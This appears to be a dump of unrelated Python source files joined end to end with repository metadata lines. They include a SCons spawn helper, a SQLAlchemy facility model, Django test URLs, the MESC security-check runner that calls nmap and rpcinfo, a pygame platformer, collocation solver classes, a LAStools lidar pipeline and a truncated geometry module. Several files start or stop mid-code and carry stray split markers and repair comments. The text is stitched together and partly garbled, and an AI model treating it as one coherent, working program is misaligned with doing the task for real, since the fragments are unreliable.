    # Spawn ``cmd`` through the Windows command interpreter ``sh`` without
    # output redirection.  Returns the child's exit status (127 when no
    # shell is available).
    if not sh:
        sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n")
        return 127
    else:
        try:
            args = [sh, '/C', escape(string.join(args)) ]
            ret = os.spawnve(os.P_WAIT, sh, args, env)
        except OSError, e:
            # Python 1.5/2.x indexable OSError: e[0] errno, e[1] message.
            ret = exitvalmap[e[0]]
            sys.stderr.write("scons: %s: %s\n" % (cmd, e[1]))
        return ret
# Windows does not allow special characters in file names anyway, so
# no n |
rnixx/chronotope | src/chronotope/model/facility.py | Python | gpl-2.0 | 4,882 | 0 | from chronotope.model.base import PublicationWorkflowBehavior
from chronotope.model.base import SQLBase
from chronotope.model.category import CategoryRecord
from chronotope.model.location import LocationRecord
from chronotope.utils import ensure_uuid
from chronotope.utils import html_index_transform
from cone.app.model import Metadata
from cone.app.model import Properties
from cone.app.model import node_info
from cone.sql import get_session
from cone.sql import metadata
from cone.sql.model import GUID
from cone.sql.model import SQLRowNode
from cone.sql.model import SQLTableNode
from node.utils import instance_property
from plumber import plumbing
from pyramid.i18n import TranslationStringFactory
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy.orm import relationship
_ = TranslationStringFactory('chronotope')
# Many-to-many association between facility and location records.
facility_location_references = Table(
    'facility_location_references',
    metadata,
    Column('facility_uid', GUID, ForeignKey('facility.uid')),
    Column('location_uid', GUID, ForeignKey('location.uid'))
)
# Many-to-many association between facility and category records.
facility_category_references = Table(
    'facility_category_references',
    metadata,
    Column('facility_uid', GUID, ForeignKey('facility.uid')),
    Column('category_uid', GUID, ForeignKey('category.uid'))
)
class FacilityRecord(SQLBase):
    """SQLAlchemy record describing a facility."""
    __tablename__ = 'facility'
    # Attributes fed into the full text index.
    __index_attrs__ = ['title', 'description']
    # Description is stored as HTML; strip the markup before indexing.
    __index_transforms__ = {
        'description': html_index_transform,
    }
    uid = Column(GUID, primary_key=True)
    submitter = Column(String)  # identifier of the submitting user
    creator = Column(String)
    created = Column(DateTime)
    modified = Column(DateTime)
    state = Column(String)  # publication workflow state
    title = Column(String)
    description = Column(String)
    exists_from = Column(String)  # period during which the facility existed
    exists_to = Column(String)
    # Many-to-many relations via the association tables above.
    category = relationship(
        CategoryRecord,
        secondary=facility_category_references,
        backref='facility')
    location = relationship(
        LocationRecord,
        secondary=facility_location_references,
        backref='facility')
def facility_by_uid(request, uid):
    """Return the single ``FacilityRecord`` with the given UUID (or None)."""
    record_uid = ensure_uuid(uid)
    session = get_session(request)
    return session.query(FacilityRecord).get(record_uid)
def facilities_by_uid(request, uids):
    """Return all ``FacilityRecord`` rows whose uid is listed in ``uids``."""
    if not uids:
        return []
    wanted = [ensure_uuid(uid) for uid in uids]
    query = get_session(request).query(FacilityRecord)
    return query.filter(FacilityRecord.uid.in_(wanted)).all()
def search_facilities(request, term, state=None, submitter=None, limit=None):
    """Search facility records by title substring.

    :param request: current request, used to acquire the SQL session.
    :param term: substring matched (SQL ``LIKE``) against the title.
    :param state: optional list of workflow states to restrict to.
    :param submitter: optional submitter identifier to restrict to.
    :param limit: optional maximum number of records to return.
    :return: matching ``FacilityRecord`` instances ordered by title.
    """
    # ``state`` defaults to None instead of the former mutable ``[]``
    # default argument; ``if state:`` treats None and [] the same way.
    session = get_session(request)
    query = session.query(FacilityRecord)
    query = query.filter(FacilityRecord.title.like(u'%{0}%'.format(term)))
    if state:
        query = query.filter(FacilityRecord.state.in_(state))
    if submitter:
        query = query.filter(FacilityRecord.submitter == submitter)
    query = query.order_by(FacilityRecord.title)
    if limit is not None:
        query = query.limit(limit)
    return query.all()
@node_info(
    name='facility',
    title=_('facility_label', default='Facility'),
    description=_('facility_description', default='A Facility'),
    icon='glyphicon glyphicon-home')
@plumbing(PublicationWorkflowBehavior)
class Facility(SQLRowNode):
    """Application node wrapping a single ``FacilityRecord``."""
    record_class = FacilityRecord

    @instance_property
    def properties(self):
        # Start from the inherited node properties and enable the UI
        # actions available for a single facility.
        # (fixed dataset garbling: was "super(Fa | cility, ...)")
        props = super(Facility, self).properties
        props.action_up = True
        props.action_up_tile = 'listing'
        props.action_view = True
        props.action_edit = True
        props.action_delete = True
        return props

    @property
    def metadata(self):
        """Expose record attributes as node metadata."""
        md = Metadata()
        md.title = self.attrs['title']
        md.description = self.attrs['description']
        md.creator = self.attrs['creator']
        md.created = self.attrs['created']
        md.modified = self.attrs['modified']
        return md
@node_info(
    name='facilities',
    title=_('facilities_label', default='Facilities'),
    description=_(
        'facilities_description',
        default='Container for Facilities'
    ),
    icon='glyphicon glyphicon-record',
    addables=['facility'])
class Facilities(SQLTableNode):
    """Container node exposing all ``FacilityRecord`` rows as children."""
    record_class = FacilityRecord
    child_factory = Facility
    @instance_property
    def properties(self):
        # Navigation and UI behaviour of the container node.
        props = Properties()
        props.in_navtree = True
        props.action_up = True
        props.action_up_tile = 'content'
        props.action_add = True
        props.default_content_tile = 'listing'
        return props
    @instance_property
    def metadata(self):
        # Static metadata; mirrors the ``node_info`` title/description.
        md = Metadata()
        md.title = _('facilities_label', default='Facilities')
        md.description = _(
            'facilities_description',
            default='Container for Facilities'
        )
        return md
|
#!/usr/bin/env python
#
# An example on how to read the YAML output from etisnoop.
# Pipe etisnoop to this script.
#
# License: public domain

import sys
import yaml

# safe_load_all parses the multi-document YAML stream without
# instantiating arbitrary Python objects.  yaml.load(_all) without an
# explicit Loader is unsafe and raises a TypeError on PyYAML >= 6.0.
for frame in yaml.safe_load_all(sys.stdin):
    print("FIGs in frame {}".format(frame['Frame']))
    for fib in frame['LIDATA']['FIC']:
        if fib['FIGs']:
            for fig in fib['FIGs']:
                print("  FIG " + fig['FIG'])
|
from os import path
from django.conf.urls.defaults import *
from models import *
import views

# Directories used by the static-serving and i18n views below.
base_dir = path.dirname(path.abspath(__file__))
media_dir = path.join(base_dir, 'media')
locale_dir = path.join(base_dir, 'locale')

# Catalog configuration for the javascript_catalog i18n view.
js_info_dict = {
    'domain': 'djangojs',
    'packages': ('regressiontests.views',),
}

# Common kwargs shared by the date-based generic views.
date_based_info_dict = {
    'queryset': Article.objects.all(),
    'date_field': 'date_created',
    'month_format': '%m',
}

urlpatterns = patterns('',
    (r'^$', views.index_page),

    # Default views
    (r'^shortcut/(\d+)/(.*)/$', 'django.views.defaults.shortcut'),
    (r'^non_existing_url/', 'django.views.defaults.page_not_found'),
    (r'^server_error/', 'django.views.defaults.server_error'),

    # i18n views
    (r'^i18n/', include('django.conf.urls.i18n')),
    (r'^jsi18n/$', 'django.views.i18n.javascript_catalog', js_info_dict),

    # Static views
    (r'^site_media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': media_dir}),

    # Date-based generic views
    (r'^date_based/object_detail/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/$',
        'django.views.generic.date_based.object_detail',
        dict(slug_field='slug', **date_based_info_dict)),
    (r'^date_based/object_detail/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/allow_future/$',
        'django.views.generic.date_based.object_detail',
        dict(allow_future=True, slug_field='slug', **date_based_info_dict)),
    (r'^date_based/archive_month/(?P<year>\d{4})/(?P<month>\d{1,2})/$',
        'django.views.generic.date_based.archive_month',
        date_based_info_dict),
)
|
1modm/mesc | include/serverinfo/tcpip.py | Python | bsd-3-clause | 7,349 | 0.004726 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__license__ = """
███╗ ███╗███████╗███████╗ ██████╗
████╗ ████║██╔════╝██╔════╝██╔════╝
██╔████╔██║█████╗ ███████╗██║
██║╚██╔╝██║██╔══╝ ╚════██║██║
██║ ╚═╝ ██║███████╗███████║╚██████╗
╚═╝ ╚═╝╚══════╝╚══════╝ ╚═════╝
MESC: Minimun Essential Security Checks
Author: https://twitter.com/1_mod_m/
Project site: https://github.com/1modm/mesc
Copyright (c) 2007-2015, Miguel Morillo
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
#------------------------------------------------------------------------------
# Modules
#------------------------------------------------------------------------------
import os
import json
from . import config
from .operations import execute_cmd, OS_dist, exists_read_file
__all__ = [
"fire"
]
#------------------------------------------------------------------------------
def fire(__host__, __user__, __passwd__, __port__, __jsonfile__, __subfolder__):
    """Run one security check described by a JSON definition file.

    :params: Target host, User, Passwd, Port, Json file and its subfolder
    :returns: tuple of (output, help text, check result constant,
        check message, check html message, command label, executed cmd)
    """
    # The net/ subfolder already carries a trailing slash in the caller.
    if (__subfolder__ == "include/serverinfo/net/"):
        __file__ = __subfolder__+__jsonfile__
    else:
        __file__ = __subfolder__+"/"+__jsonfile__
    with open(__file__) as data_file:
        data = json.loads(data_file.read())
    __help_result__ = data["help_result"]
    __command__ = data["command"]
    __distribution__, __env_shell__ = OS_dist(__host__, __user__, __passwd__, __port__)
    __type__ = data["type"]
    # "execute_cmd": run a distribution-specific shell command.
    if __type__ == "execute_cmd":
        __cmd__ = data["distribution"][__distribution__]["cmd"]
        # nmap/rpcinfo need the target host appended.
        if (data["check"] == "nmap"):
            __cmd__ = __cmd__ + " " + __host__
        if (data["check"] == "rpcinfo"):
            __cmd__ = __cmd__ + " " + __host__
        __output__, __command_check__ = execute_cmd(__cmd__, __env_shell__ , __host__, __user__, __passwd__, __port__)
    # "exists_read_file": the check passes if the file exists and is readable.
    if __type__ == "exists_read_file":
        __file__ = data["distribution"][__distribution__]["file"]
        __cmd_check__, __output__ = exists_read_file(__file__, __env_shell__, __host__, __user__, __passwd__, __port__)
        if (__cmd_check__):
            __command_check__ = config.CHECKRESULTOK
            __cmd__ = __file__
        else:
            __command_check__ = config.CHECKRESULTERROR
            __cmd__ = __file__
    # "check_file_exact": look for an exact entry inside the file and
    # escalate warnings to critical depending on the configured level.
    if __type__ == "check_file_exact":
        __file__ = data["distribution"][__distribution__]["file"]
        __check__ = [data["distribution"][__distribution__]["chk"]]
        __cmd_check__, __output__ = exists_read_file(__file__, __env_shell__, __host__, __user__, __passwd__, __port__)
        if not __cmd_check__:
            __command_check__ = config.CHECKRESULTERROR
            __cmd__ = __file__
        else:
            __command_check__, __line__, __linehtml__, __check_count__ =\
            check_file_exact(__file__, __check__, __env_shell__, __host__, __user__, __passwd__,
                             __port__)
            if (data["level"] != ""):
                __level__ = int(data["level"])
                if (__command_check__ == config.CHECKRESULTWARNING and __level__ > config.VALUECRITICAL):
                    __command_check__ = config.CHECKRESULTCRITICAL
            __recommendations__ = data["recommendations"]
            if __command_check__ == config.CHECKRESULTCRITICAL:
                __output__ = __recommendations__
            else:
                __output__ = config.CHECKRESULTOK
            __cmd__ = __file__
    # "check_file_exact_load": like check_file_exact but the raw file
    # content is kept as the output.
    if __type__ == "check_file_exact_load":
        __file__ = data["distribution"][__distribution__]["file"]
        __check__ = [data["distribution"][__distribution__]["chk"]]
        __cmd_check__, __output__ = exists_read_file(__file__, __env_shell__, __host__, __user__, __passwd__, __port__)
        if not __cmd_check__:
            __command_check__ = config.CHECKRESULTERROR
            __cmd__ = __file__
        else:
            __command_check__, __line__, __linehtml__, __check_count__ =\
            check_file_exact(__file__, __check__, __env_shell__, __host__, __user__, __passwd__,
                             __port__)
            __cmd__ = __file__
    # Map the result constant to the per-result messages from the JSON file.
    if __command_check__ == config.CHECKRESULTOK:
        __check_message__ = data["result"]["checkresultok"]["check_message"]
        __check_html_message__ = data["result"]["checkresultok"]["check_html_message"]
    elif __command_check__ == config.CHECKRESULTWARNING:
        __check_message__ = data["result"]["checkresultwarning"]["check_message"]
        __check_html_message__ = data["result"]["checkresultwarning"]["check_html_message"]
    elif __command_check__ == config.CHECKRESULTCRITICAL:
        __check_message__ = data["result"]["checkresultcritical"]["check_message"]
        __check_html_message__ = data["result"]["checkresultcritical"]["check_html_message"]
    elif __command_check__ == config.CHECKRESULTERROR:
        __check_message__ = data["result"]["checkresulterror"]["check_message"]
        __check_html_message__ = data["result"]["checkresulterror"]["check_html_message"]
    return (__output__.decode("ascii", "ignore"), __help_result__, __command_check__, __check_message__,
            __check_html_message__, __command__, __cmd__)
|
adcomp/super-fruit-pie | tuto/06_collect.py | Python | mit | 7,778 | 0.0027 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# David Art <david.madbox@gmail.com>
# Program Arcade Games With Python And Pygame - Build a Platformer
# http://programarcadegames.com
import pygame
import random
WIDTH = 640
HEIGHT = 480
class Platform (pygame.sprite.Sprite):
    """Static platform sprite loaded from a fixed image.

    NOTE(review): the ``width``/``height`` parameters are accepted but
    unused -- the sprite always uses 'images/block.png'; confirm intent.
    """
    def __init__(self, width, height):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load('images/block.png')
        self.rect = self.image.get_rect()
class Raspberry(pygame.sprite.Sprite):
    """Collectible raspberry sprite."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        # (fixed dataset garbling: stray "|" before this line)
        self.image = pygame.image.load('images/raspberry.png')
        self.rect = self.image.get_rect()
class Player(pygame.sprite.Sprite):
    """The controllable player sprite with simple platformer physics."""
    # Movement state; class-level defaults, overwritten per instance.
    change_x = 0
    change_y = 0
    jump_ok = True
    frame_since_collision = 0

    def __init__(self, x, y):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load('images/player.png')
        # (fixed dataset garbling: was "get_re | ct()")
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y

    def update(self, blocks, raspberries):
        """Move the player, collecting raspberries and colliding with blocks."""
        # Horizontal movement first.
        self.rect.x += self.change_x
        # check collision with raspberries (collect them)
        block_hit_list = pygame.sprite.spritecollide(self, raspberries, False)
        for raspberry in block_hit_list:
            raspberries.remove(raspberry)
        # check collision with platform
        block_hit_list = pygame.sprite.spritecollide(self, blocks, False)
        for block in block_hit_list:
            # If we are moving right, set our right side to the left side of the item we hit
            if self.change_x > 0:
                self.rect.right = block.rect.left
            else:
                # Otherwise if we are moving left, do the opposite.
                self.rect.left = block.rect.right
        # Then vertical movement.
        self.rect.y += self.change_y
        block_hit_list = pygame.sprite.spritecollide(self, blocks, False)
        for block in block_hit_list:
            if self.change_y > 0:
                self.jump_ok = True
                # Keep track of the last time we hit something
                self.frame_since_collision = 0
            # Reset our position based on the top/bottom of the object.
            if self.change_y > 0:
                self.rect.bottom = block.rect.top
            else:
                self.rect.top = block.rect.bottom
            # Stop our vertical movement
            self.change_y = 0
        # If we haven't hit anything in a while, allow us jump
        if self.frame_since_collision > 2:
            self.jump_ok = False
        # Increment frame counter
        self.frame_since_collision += 1

    # Calculate effect of gravity.
    def calc_grav(self):
        self.change_y += .4
        # See if we are on the ground.
        if self.rect.y >= HEIGHT-48 and self.change_y >= 0:
            self.change_y = 0
            self.rect.y = HEIGHT-48
            self.frame_since_collision = 0
            self.jump_ok = True

    # Called when user hits 'jump' button
    def jump(self, blocks):
        # If it is ok to jump, set our speed upwards
        if self.jump_ok:
            self.change_y = -9.81
class Game():
    """Bundles window setup and sprite groups.

    NOTE(review): this class is not instantiated by the script below,
    which duplicates the same setup at module level.
    """
    def __init__(self, width=640, height=480, fullscreen=False):
        self.width = width
        self.height = height
        if fullscreen:
            flags = pygame.FULLSCREEN
        else:
            flags = 0
        pygame.init()
        self.screen = pygame.display.set_mode([width, height], flags, 32)
        pygame.display.set_caption("RaspJam")
        self.scene = Scene()
        # Fixed garbled attribute name: was "bself.lock_list", which
        # raised NameError and left self.block_list unset for the
        # create_level1 call below.
        self.block_list = pygame.sprite.Group()
        self.all_sprites_list = pygame.sprite.Group()
        self.raspberry_list = pygame.sprite.Group()
        create_level1(self.block_list, self.all_sprites_list)
        self.player = Player(32, 32)
        self.player.rect.x = 240
        self.player.rect.y = 0
        self.all_sprites_list.add(self.player)

    def update(self):
        pass

    def draw(self):
        pass
class Scene:
    """Background scene; draws the level backdrop image."""
    def __init__(self):
        self.image = pygame.image.load('images/bg.png')
    def draw(self, screen):
        # Blit the backdrop at the top-left corner, covering the screen.
        screen.blit(self.image, (0, 0))
# Create platforms
def create_level1(block_list, all_sprites_list):
    """Populate both sprite groups with the platforms of level 1.

    :param block_list: group receiving the collision platforms.
    :param all_sprites_list: group used for drawing all sprites.
    """
    # (x, y) top-left corners of each 128x16 platform; the list replaces
    # eight copy-pasted creation blocks and preserves their order.
    positions = [
        (160, 128), (352, 128),
        (0, 432), (WIDTH - 128, 432),
        (0, 240), (WIDTH - 128, 240),
        (160, 336), (352, 336),
    ]
    for x, y in positions:
        block = Platform(128, 16)
        block.rect.x = x
        block.rect.y = y
        block_list.add(block)
        all_sprites_list.add(block)
# Initialize the window
pygame.init()
# Set the height and width of the screen
screen = pygame.display.set_mode([WIDTH, HEIGHT], 0, 32)
pygame.display.set_caption("RaspJam")
background = pygame.image.load('images/bg.png')
# Main program, create the blocks
block_list = pygame.sprite.Group()
all_sprites_list = pygame.sprite.Group()
raspberry_list = pygame.sprite.Group()
create_level1(block_list,all_sprites_list)
player = Player(32, 32)
player.rect.x = 240
player.rect.y = 0
all_sprites_list.add(player)
# Scatter 16 raspberries on a 92-pixel grid.
for i in range(16):
    # This represents a block
    block = Raspberry()
    # Set a random location for the block
    # NOTE(review): WIDTH/92 is a float on Python 3 and randrange would
    # raise TypeError -- this script assumes Python 2 integer division.
    block.rect.x = random.randrange(WIDTH/92)* 92
    block.rect.y = random.randrange(HEIGHT/92)* 92
    # Add the block to the list of objects
    raspberry_list.add(block)
    #~ all_sprites_list.add(block)
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
# -------- Main Program Loop -----------
while not done:
    # --- Event Processing
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            done = True
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_ESCAPE:
                done = True
            if event.key == pygame.K_LEFT:
                player.change_x = -6
            if event.key == pygame.K_RIGHT:
                player.change_x = 6
            if event.key == pygame.K_SPACE:
                player.jump(block_list)
        if event.type == pygame.KEYUP:
            if event.key == pygame.K_LEFT:
                player.change_x = 0
            if event.key == pygame.K_RIGHT:
                player.change_x = 0
    # --- Game Logic
    # Wrap player around the screen
    if player.rect.x >= WIDTH:
        player.rect.x = -15
    if player.rect.x <= -16:
        player.rect.x = WIDTH
    player.calc_grav()
    player.update(block_list, raspberry_list)
    block_list.update()
    # --- Draw Frame
    #~ screen.fill(BLACK)
    screen.blit(background, (0, 0))
    all_sprites_list.draw(screen)
    raspberry_list.draw(screen)
    pygame.display.flip()
    # Cap the frame rate at 60 FPS.
    clock.tick(60)
pygame.quit ()
|
davidrpugh/pyCollocation | pycollocation/solvers/solutions.py | Python | mit | 1,746 | 0.000573 | """
Classes for representing solutions to boundary value problems.
@author : davidrpugh
"""
class SolutionLike(object):
    """Read-only interface shared by solution objects.

    Exposes the private attributes set by concrete implementations
    (see ``Solution``) as properties.
    """
    @property
    def basis_kwargs(self):
        # dict describing the approximation basis
        return self._basis_kwargs
    @property
    def functions(self):
        # list of callables approximating the solution components
        return self._functions
    @property
    def nodes(self):
        # collocation nodes used to compute the solution
        return self._nodes
    @property
    def problem(self):
        # the boundary value problem that was solved
        return self._problem
    @property
    def residual_function(self):
        # callable evaluating the residuals at given points
        return self._residual_function
    @property
    def result(self):
        # raw optimization result returned by the solver
        return self._result
class Solution(SolutionLike):
    """Class representing the solution to a Boundary Value Problem (BVP)."""

    def __init__(self, basis_kwargs, functions, nodes, problem, residual_function, result):
        """
        Initialize an instance of the Solution class.

        Parameters
        ----------
        basis_kwargs : dict
        functions : list
        nodes : numpy.ndarray
        problem : TwoPointBVPLike
        residual_function : callable
        result : OptimizeResult

        """
        # (fixed dataset garbling on the first and fourth assignments)
        self._basis_kwargs = basis_kwargs
        self._functions = functions
        self._nodes = nodes
        self._problem = problem
        self._residual_function = residual_function
        self._result = result

    def evaluate_residual(self, points):
        """Evaluate the residual function at the given points."""
        return self.residual_function(points)

    def evaluate_solution(self, points):
        """Evaluate each solution function at the given points."""
        return [f(points) for f in self.functions]

    def normalize_residuals(self, points):
        """Normalize residuals by the level of the variable."""
        residuals = self.evaluate_residual(points)
        solutions = self.evaluate_solution(points)
        return [resid / soln for resid, soln in zip(residuals, solutions)]
|
thor/django-localflavor | localflavor/uy/util.py | Python | bsd-3-clause | 350 | 0 | # -*- coding: utf-8 -*-
def get_validation_digit(number):
    """Calculate the validation digit for the given number.

    Implements the modulo-10 weighted checksum used for Uruguayan
    identity documents: each digit, taken from the right, is multiplied
    by the weights 4, 3, 6, 7, 8, 9, 2 and accumulated modulo 10.
    (Fixed dataset garbling in the return expression: "we | ighted_sum".)

    :param number: document number as an int or a string of digits;
        only the rightmost 7 digits are significant.
    :return: the validation digit, an int in ``range(10)``.
    """
    weights = [4, 3, 6, 7, 8, 9, 2]
    weighted_sum = 0
    for digit, weight in zip(reversed(str(number)), weights):
        weighted_sum = (int(digit) * weight + weighted_sum) % 10
    return (10 - weighted_sum) % 10
|
herow/planning_qgis | python/plugins/processing/algs/lidar/lastools/flightlinesToDTMandDSM.py | Python | gpl-2.0 | 6,225 | 0.002088 | # -*- coding: utf-8 -*-
"""
***************************************************************************
flightlinesToDTMandDSM.py
---------------------
Date : April 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'May 2014'
__copyright__ = '(C) 2014, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterString
class flightlinesToDTMandDSM(LAStoolsAlgorithm):
    """Processing pipeline: tile flightlines, ground-classify the tiles,
    then rasterize them into DTMs (ground only) and DSMs (first returns).
    """
    TILE_SIZE = "TILE_SIZE"
    BUFFER = "BUFFER"
    TERRAIN = "TERRAIN"
    TERRAINS = ["wilderness", "nature", "town", "city", "metro"]
    BASE_NAME = "BASE_NAME"

    def defineCharacteristics(self):
        """Declare the algorithm name, group and GUI parameters."""
        self.name = "flightlinesToDTMandDSM"
        self.group = "LAStools Pipelines"
        self.addParametersPointInputFolderGUI()
        self.addParameter(ParameterNumber(flightlinesToDTMandDSM.TILE_SIZE,
            self.tr("tile size (side length of square tile)"),
            0, None, 1000.0))
        self.addParameter(ParameterNumber(flightlinesToDTMandDSM.BUFFER,
            self.tr("buffer around each tile (avoids edge artifacts)"),
            0, None, 25.0))
        self.addParameter(ParameterSelection(flightlinesToDTMandDSM.TERRAIN,
            self.tr("terrain type"), flightlinesToDTMandDSM.TERRAINS, 1))
        self.addParametersStepGUI()
        self.addParametersTemporaryDirectoryGUI()
        self.addParametersOutputDirectoryGUI()
        self.addParameter(ParameterString(flightlinesToDTMandDSM.BASE_NAME,
            self.tr("tile base name (using 'sydney' creates sydney_274000_4714000...)"), "tile"))
        self.addParametersRasterOutputFormatGUI()
        self.addParametersCoresGUI()
        self.addParametersVerboseGUI()

    def processAlgorithm(self, progress):
        """Run lastile, lasground and las2dem (DTM + DSM) in sequence."""
        # first we tile the data
        commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lastile")]
        self.addParametersVerboseCommands(commands)
        self.addParametersPointInputFolderCommands(commands)
        commands.append("-files_are_flightlines")
        tile_size = self.getParameterValue(flightlinesToDTMandDSM.TILE_SIZE)
        commands.append("-tile_size")
        commands.append(str(tile_size))
        # renamed from "buffer" to avoid shadowing the builtin
        buffer_size = self.getParameterValue(flightlinesToDTMandDSM.BUFFER)
        if buffer_size != 0.0:
            commands.append("-buffer")
            commands.append(str(buffer_size))
        self.addParametersTemporaryDirectoryAsOutputDirectoryCommands(commands)
        base_name = self.getParameterValue(flightlinesToDTMandDSM.BASE_NAME)
        if base_name == "":
            base_name = "tile"
        commands.append("-o")
        commands.append(base_name)
        commands.append("-olaz")
        LAStoolsUtils.runLAStools(commands, progress)
        # then we ground classify the tiles
        commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasground")]
        self.addParametersVerboseCommands(commands)
        self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*.laz")
        method = self.getParameterValue(flightlinesToDTMandDSM.TERRAIN)
        if method != 1:
            commands.append("-" + flightlinesToDTMandDSM.TERRAINS[method])
        # finer granularity for rougher terrain types
        if method > 2:
            commands.append("-ultra_fine")
        elif method > 1:
            commands.append("-extra_fine")
        elif method > 0:
            commands.append("-fine")
        self.addParametersTemporaryDirectoryAsOutputDirectoryCommands(commands)
        commands.append("-odix")
        commands.append("_g")
        commands.append("-olaz")
        self.addParametersCoresCommands(commands)
        LAStoolsUtils.runLAStools(commands, progress)
        # then we rasterize the classified tiles into DTMs (class 2 = ground)
        commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "las2dem")]
        self.addParametersVerboseCommands(commands)
        self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*_g.laz")
        commands.append("-keep_class")
        commands.append("2")
        self.addParametersStepCommands(commands)
        commands.append("-use_tile_bb")
        self.addParametersOutputDirectoryCommands(commands)
        commands.append("-ocut")
        commands.append("2")
        commands.append("-odix")
        commands.append("_dtm")
        self.addParametersRasterOutputFormatCommands(commands)
        self.addParametersCoresCommands(commands)
        LAStoolsUtils.runLAStools(commands, progress)
        # then we rasterize the classified tiles into DSMs (first returns)
        commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "las2dem")]
        self.addParametersVerboseCommands(commands)
        # (fixed dataset garbling: stray "|" before this call)
        self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*_g.laz")
        commands.append("-first_only")
        self.addParametersStepCommands(commands)
        commands.append("-use_tile_bb")
        self.addParametersOutputDirectoryCommands(commands)
        commands.append("-ocut")
        commands.append("2")
        commands.append("-odix")
        commands.append("_dsm")
        # (fixed dataset garbling: was "addParametersR | asterOutputFormatCommands")
        self.addParametersRasterOutputFormatCommands(commands)
        self.addParametersCoresCommands(commands)
        LAStoolsUtils.runLAStools(commands, progress)
|
jackey-qiu/genx_pc_qiu | geometry_modules/trigonal_pyramid_distortion_B.py | Python | gpl-3.0 | 12,062 | 0.044354 | import numpy as np
from numpy.linalg import inv
import os
#the original version has been saved as B3 just in case
#here we only consider the distortion caused by the length difference of three edges; it is basically a tetrahedral configuration, but not a regular one
#since the top angle can be any value in [0,2*pi/3]
# Unit basis vectors of the original (laboratory) frame.
x0_v,y0_v,z0_v=np.array([1.,0.,0.]),np.array([0.,1.,0.]),np.array([0.,0.,1.])
#anonymous function f1 calculating the transformation matrix from the basis vector expressions; x1,y1,z1 is the original basis
#x2,y2,z2 are the basis vectors of the new frame expressed in the original frame, new=T.orig
f1=lambda x1,y1,z1,x2,y2,z2:np.array([[np.dot(x2,x1),np.dot(x2,y1),np.dot(x2,z1)],\
                                      [np.dot(y2,x1),np.dot(y2,y1),np.dot(y2,z1)],\
                                      [np.dot(z2,x1),np.dot(z2,y1),np.dot(z2,z1)]])
#f2 calculates the distance between p1 and p2
f2=lambda p1,p2:np.sqrt(np.sum((p1-p2)**2))
#anonymous function f3 calculates the coordinates of a basis vector with magnitude 1.; p1 and p2 are coordinates of two known points, the
#direction of the basis vector points from p1 to p2
f3=lambda p1,p2:(1./f2(p1,p2))*(p2-p1)+p1
#refer to the associated ppt file when reading the comments
# Lattice parameters (Angstrom) used to scale fractional coordinates.
basis=np.array([5.038,5.434,7.3707])
#atoms to be checked for distance
#for half layer
atms_cell=[[0.653,1.112,1.903],[0.847,0.612,1.903],[0.306,0.744,1.75],[0.194,0.243,1.75],\
           [0.5,1.019,1.645],[0,0.518,1.645],[0.847,0.876,1.597],[0.653,0.375,1.597]]
#for full layer
#atms_cell=[[0.153,1.062,2.113],[0.347,0.563,2.113],[0.653,1.112,1.903],[0.847,0.612,1.903],[0,0.9691,1.855],[0.5,0.469,1.855],[0.306,0.744,1.75],[0.194,0.243,1.75],\
